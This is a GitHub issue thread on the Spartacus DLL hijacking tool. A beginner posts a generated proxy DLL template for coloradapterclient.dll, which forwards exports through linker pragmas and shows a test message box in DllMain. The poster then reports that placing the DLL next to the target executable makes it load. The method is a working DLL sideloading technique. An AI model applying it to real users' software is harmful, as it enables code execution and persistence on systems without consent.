Accenture/Spartacus

What to do next, WITHOUT DLL Proxying?

windowshopr opened this issue · 1 comments

I read through the article that details how to sideload/proxy a DLL function, which is great, however (as a noob), I'm wondering if there's an article or some steps to follow for NOT proxying a function, and just using MAINDLL?

The steps I followed so far look like this:

  1. Created ProcMon log, parsed using Spartacus, and opened a created VS solution file.
  2. Have a code example that looks like this:
#pragma once

#pragma comment(linker,"/export:ModernColorGetGDILutFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorGetGDILutFromHDC,@1")
#pragma comment(linker,"/export:ModernColorSetGDILut=C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILut,@2")
#pragma comment(linker,"/export:ModernColorSetGDILutFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILutFromHDC,@3")
#pragma comment(linker,"/export:ModernColorSetLut=C:\\Windows\\System32\\coloradapterclient.ModernColorSetLut,@4")
#pragma comment(linker,"/export:ModernColorSetMatrix=C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrix,@5")
#pragma comment(linker,"/export:ModernColorSetMatrixFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrixFromHDC,@6")

#include "windows.h"
#include "ios"
#include "fstream"


//// Remove this line if you aren't proxying any functions.
//HMODULE hModule = LoadLibrary(L"C:\\Windows\\System32\\coloradapterclient.dll");

//// Remove this function if you aren't proxying any functions.
//VOID DebugToFile(LPCSTR szInput)
//{
//    std::ofstream log("spartacus-proxy-coloradapterclient.log", std::ios_base::app | std::ios_base::out);
//    log << szInput;
//    log << "\n";
//}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		MessageBox(NULL, L"coloradapterclient.dll attached to", L"coloradapterclient.dll", MB_OK); // Sample for testing
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
  1. Compiled the DLL file, and it shows up in the project's "x64 > Debug" folder.

So now what? This is a silly question I know, but it's hard to figure this advanced stuff out as newbie.

The DLL that gets compiled has the same name as the target DLL file, which I assume I don't want to overwrite with the target DLL file, but I assume we need to "link" the target DLL to this compiled DLL somehow, but again with no proxying.

Can I get some direction on how to get my test MessageBox to appear and perform my first DLL hijack!? :) Thanks!

We can totally close this issue! I've discovered that to get the compiled DLL to run, you can simply copy/paste it somewhere in the DLL lookup order and it'll trigger. In my case, I just put the compiled DLL into the same folder as the .exe of the program I'm hijacking, fired up the program and voila, message box appeared. Thanks for letting me work this out! Success!